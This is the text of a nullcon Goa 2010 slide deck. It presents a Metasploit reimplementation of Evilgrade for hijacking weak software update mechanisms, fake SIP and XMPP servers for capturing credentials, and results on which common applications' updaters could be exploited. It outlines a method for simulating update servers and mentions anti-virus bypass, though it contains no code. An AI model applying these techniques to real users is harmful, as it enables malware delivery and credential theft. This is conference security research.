2. Overview
Introduction
Background
Title
Realization
Results
Conclusion
Demos in between !
nullcon Goa 2010 http://nullcon.net
3. Introduction
IT Security
Increasing attacks
nullcon Goa 2010 http://nullcon.net
4. Introduction
IT Security
Increasing attacks
also in Germany
nullcon Goa 2010 http://nullcon.net
5. Introduction
Know your enemy !
”So it is said that if you know your
enemies and know yourself, you will
fight without danger in battles.
If you only know yourself, but not your
opponent, you may win or may lose.
If you know neither yourself nor your
enemy, you will always endanger
yourself.”
nullcon Goa 2010 http://nullcon.net
6. Background
The man in the middle
The hacker tools
Evilgrade
Metasploit
Karma + Karmetasploit
nullcon Goa 2010 http://nullcon.net
7. The man in the middle attack
nullcon Goa 2010 http://nullcon.net
8. Known MitM attacks
ARP spoofing
DNS spoofing
BGP hacking
ICMP redirect, ...
Karma !
The evil twin hotspot
nullcon Goa 2010 http://nullcon.net
9. Background
The hacker tools
nullcon Goa 2010 http://nullcon.net
10. Evilgrade
Framework for attacking weak update
mechanisms
”The idea..is the centralization
and exploitation of different
update impl. all together in one
tool”
Written in Perl and published
2007-2008
Existing Module
Sun Java
nullcon Goa 2010 http://nullcon.net
Apple OS X
11. Evilgrade
How does it work
nullcon Goa 2010 http://nullcon.net
14. Metasploit
Vulnerability development framework
Reduce the work for creating an exploit
Penetration testing
Several hundert exploits
#5 from top 100 security tools
Written in Ruby and BSD licensed
"Don't try to teach yourself how to
use metasploit under the security
camera at the airport"
nullcon Goa 2010 http://nullcon.net
16. Karma
The evil twin access point
MitM attack on WinXp
Wireless Zero Configuration...
Or just name ”FreeWifi” ;)
After MitM, steal authentication
data
Http, Ftp, Pop3, Imap and so on
Released in 2004
nullcon Goa 2010 http://nullcon.net
17. Karmetasploit
Reimplemantion of Karma into
Metasploit
Fake access point integrated into
aircrack-ng
Authentication capturing
implemented as auxiliary modules
for Metasploit
Several improvements
Better hardware support
Cookie,Form data stealing
nullcon Goa 2010 http://nullcon.net
Browser exploitation
18. Goals
Evilgrade 2 Metasploit
Reimplement functionality as metasploit
module
Improve new system
• Port Sharing, Stealth mode, faster
metasploit payload generation
Transfer existing evilgrade modules
into new system
Create new fake servers
Sip and XMPP
Find new vulnerabilities in
nullcon Goa 2010 http://nullcon.net
software
19. Fake XMPP
Based on TCP
Used for Jabber → Instant Messaging
Google Talk...
Has built-in strong security, but
depends on server and client
Cleartext password transmission
possible
nullcon Goa 2010 http://nullcon.net
20. Fake Sip Server
UDP based protocol
Redefined in serveral RFCs
Authentication similar to HTTP
Digest
Challenge – Response
Try downgrade attack to use Basic
Authentication
nullcon Goa 2010 http://nullcon.net
27. Analysis
1. Install an old version on the target.
2. Sniff the update process on the attacker.
3. Analyze network communication.
4. If possible, try to simulate the update
server.
5. If possible, install latest version on
the target.
6. Improve server to be version independent.
7. Improve server to allow to configure
options, like the description shown as
update information to the client.
nullcon Goa 2010 http://nullcon.net
28. Results
Fake SIP and XMPP servers
Reimplementation of Evilgrade
Analysis of update implemenations
Not hacked
Indirect hacks
Hacked
nullcon Goa 2010 http://nullcon.net
29. Results – fake server
XMPP
Works
SIP
Downgrade attack had no success
Capturing of Digest Authentication is
working
DEMO
nullcon Goa 2010 http://nullcon.net
30. Results
Evilgrade in Metasploit
Reimpl. the old functionality
Old modules ported
Several improvements
• All mentioned ones
• Anti-virus bypassing for metasploit
payloads
( DEMO at the end if time left )
• Some others...
nullcon Goa 2010 http://nullcon.net
31. Results - Analysis
Not hacked
uTorrent
Avira Antivir
Foxit Reader
Vlc uses PGP
Ad-Aware only one that uses SSL
Spybot, AVG Antivir, Comodo Firewall,
Picasa, ZoneAlarm, Winrar, flashget,
camfrog..
nullcon Goa 2010 http://nullcon.net
32. Results – Not hacked
Not hacked
uTorrent uses binary signed data ?!?
nullcon Goa 2010 http://nullcon.net
33. Results – Not hacked
Not hacked
Avira Antivir
MASTER.IDX
CRDATE=20090505_1833
<3f76d242c16a5491bfe98540f68c36c9>
nullcon Goa 2010 http://nullcon.net
34. Results – Not hacked
Foxit Reader and the fzip file
format
nullcon Goa 2010 http://nullcon.net
35. Results - Analysis
Indirect hack
Skype
Quicktime
Orbit Downloader
Miranda IM
DEMO
nullcon Goa 2010 http://nullcon.net
40. Conclusion
Release candidate of evil
karmetasploit upgrade is ready
No need for Evilgrade anymore
Several improvements compared to
Evilgrade
New authentification capturing servers
Several weak update implementations
found,
over 100 million downloads from
www.cnet.com
nullcon Goa 2010 http://nullcon.net
41. Conclusion
Feature list for version 2
SIP downgrade attack on old SIP
hardware
Fake server XMPP over HTTP
Improve design to handle Avira Antivir
Feature list of version 3
Advanded stealth mode
• Intelligent fake DNS server
Find more vulnerabilites
nullcon Goa 2010 http://nullcon.net
42. Conclusion
Software developers
Please make secure software
Use standards and deny weak stuff by
default
And for the rest of us
Be aware of this attack vectors
Do not install every ”important
security update”
Do not trust security software by
default
Do not trust the Internet,
nullcon Goa 2010 http://nullcon.net
especially (public) Wifi networks
43. That's it !
Q & A
nullcon Goa 2010 http://nullcon.net